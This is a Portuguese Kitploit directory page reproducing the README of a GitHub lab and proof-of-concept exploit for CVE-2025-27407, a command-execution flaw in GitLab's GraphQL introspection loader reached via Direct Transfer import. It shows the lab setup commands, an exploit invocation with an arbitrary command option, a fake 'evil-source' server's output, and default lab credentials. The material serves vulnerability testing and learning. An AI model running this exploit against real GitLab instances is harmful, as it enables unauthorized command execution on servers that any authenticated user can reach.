Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-27407 — Laboratória local e exploit de prova de conceito para CVE-2025-27407, visando o carregador de esquema de introspecção GraphQL do GitLab através do caminho HTTP Direct Transfer. Inclui ambiente conteinerizado e script de acionamento automatizado. | Kitploit
Ferramentas/GitHubGitHub/logggg2402/cve-2025-27407
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHublogggg2402/cve-2025-27407

CVE-2025-27407

Laboratória local e exploit de prova de conceito para CVE-2025-27407, visando o carregador de esquema de introspecção GraphQL do GitLab através do caminho HTTP Direct Transfer. Inclui ambiente conteinerizado e script de acionamento automatizado.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-27407 Laboratório Podman do GitLab

Laboratório local mínimo para comprovar o caminho HTTP de Transferência Direta do GitLab que atinge o carregador de esquema de introspecção graphql-ruby vulnerável. O laboratório executa um contêiner GitLab CE vulnerável; o script PoC inicia seu servidor de origem falso do GitLab em processo apenas durante o teste.

Execute isto apenas contra sistemas que você possui ou para os quais tem autorização explícita para testar.

Arquivos

ArquivoFinalidade
lab.shInicia, aguarda, verifica e limpa o laboratório GitLab.
poc_host_port_cmd.pyPoC único: servidor de origem falso + acionador de login/configure/import do GitLab.

Requisitos

  • Máquina Linux com podman
  • curl
  • Portas locais livres para o GitLab e o servidor de origem falso do PoC
  • RAM/disco suficiente para o contêiner GitLab Omnibus

Valores padrão:

ItemPadrão
Imagem do GitLabdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
Contêiner do GitLabcve-27407-gitlab
Rede Podmancve-2025-27407-net
Usuário root do GitLabroot
Senha do root do GitLabCve27407Password!
Marcador/tmp/cve_2025_27407_gitlab_marker

Iniciar o Laboratório

A porta 8080 é o padrão do script. Se outra coisa já estiver usando, use 18080 como mostrado aqui.

root@kitploit:~
cd gitlab-lab
chmod +x lab.sh poc_host_port_cmd.py

GITLAB_HTTP_PORT=18080 GITLAB_SSH_PORT=2225 ./lab.sh up

Abra o GitLab em:

root@kitploit:~
http://127.0.0.1:18080

Credenciais de login:

root@kitploit:~
root / Cve27407Password!

root é apenas o usuário padrão do laboratório. O acionador do PoC não requer uma conta de administrador; qualquer usuário autenticado que possa criar/importar para um namespace de destino pode atingir o caminho vulnerável de Transferência Direta. Use --username e --password para testar com um usuário não administrador.

Executar o PoC

root@kitploit:~
MARKER=/tmp/cve_2025_27407_gitlab_marker
podman exec cve-27407-gitlab rm -f "$MARKER"

./poc_host_port_cmd.py \
  --host 127.0.0.1 \
  --port 18080 \
  --listen-port 8001 \
  --wait-seconds 120 \
  --cmd "touch $MARKER"

MARKER="$MARKER" ./lab.sh verify

Sinais esperados:

root@kitploit:~
[*] create/import trigger status=200 final_url=http://127.0.0.1:18080/import/bulk_imports
[{"success":true,...}]
[evil-source] POST /api/graphql introspection -> malicious schema; command='touch ...'
[+] GitLab reached /api/graphql introspection over HTTP
[+] vulnerable: marker file exists inside GitLab container

Opções

OpçãoFinalidadePadrão
--hostHost do GitLab a ser alvoObrigatório
--portPorta HTTP do GitLab a ser alvoObrigatório
--cmdComando executado no runtime do GitLabtouch /tmp/cve_2025_27407_gitlab_marker
--listen-portPorta local do servidor de origem falso8001
--wait-secondsTempo para manter fonte falsa ativa para workers assíncronos do GitLab90
--usernameNome de usuário do GitLabroot
--passwordSenha do GitLabCve27407Password!

Substituições de Ambiente

VariávelFinalidadePadrão
GITLAB_HTTP_PORTPorta HTTP do GitLab (host/contêiner)8080
GITLAB_SSH_PORTPorta SSH do GitLab no host2224
GITLAB_ROOT_PASSWORDSenha inicial do rootCve27407Password!
GITLAB_IMAGEImagem do GitLab a ser executadadocker.io/gitlab/gitlab-ce:16.11.8-ce.0
NETWORKNome da rede Podmancve-2025-27407-net
MARKERArquivo verificado dentro do contêiner GitLab/tmp/cve_2025_27407_gitlab_marker
TIMEOUT_SECONDSTempo limite de espera pela prontidão1200

Solução de Problemas

  • Se a porta 8080 estiver ocupada, use GITLAB_HTTP_PORT=18080 para ./lab.sh up.
  • Se o PoC não conseguir vincular sua porta de origem, altere --listen-port para uma porta não utilizada.
  • Se a verificação do marcador competir com o worker de importação em segundo plano, aumente --wait-seconds ou execute novamente MARKER="$MARKER" ./lab.sh verify.
  • Se o GitLab ainda não estiver pronto, execute novamente GITLAB_HTTP_PORT=18080 ./lab.sh wait.
  • Se um laboratório anterior estiver travado, execute ./lab.sh cleanup e comece novamente.

Limpeza

root@kitploit:~
./lab.sh cleanup

Isso remove o contêiner GitLab, qualquer contêiner de origem falsa legado de versões anteriores do laboratório e a rede do laboratório. Não remove imagens Podman baixadas.

Baixar ferramenta